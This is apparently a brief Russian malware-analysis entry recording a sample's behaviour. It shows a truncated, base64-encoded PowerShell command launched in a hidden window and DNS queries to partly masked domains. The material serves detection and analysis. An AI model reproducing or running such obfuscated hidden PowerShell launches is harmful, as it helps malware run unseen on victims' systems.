Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGMAawB3AGsAVQBjAFoAPQAnAFgAWgBCAHcAQQBvADEAUQBBAFUAdwAnADsAJABLAEIAQQBBAEcAQQBjAEEAQQBBAFgAUQAgAD...
- DNS ASK ou###tsmm.com
- DNS ASK go###dteam.com
- DNS ASK mi###aly.com
- DNS ASK ar####aterra.com
- DNS ASK ta###tasty.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGMAawB3AGsAVQBjAFoAPQAnAFgAWgBCAHcAQQBvADEAUQBBAFUAdwAnADsAJABLAEIAQQBBAEcAQQBjAEEAQQBBAFgAUQAgAD...' (со скрытым окном)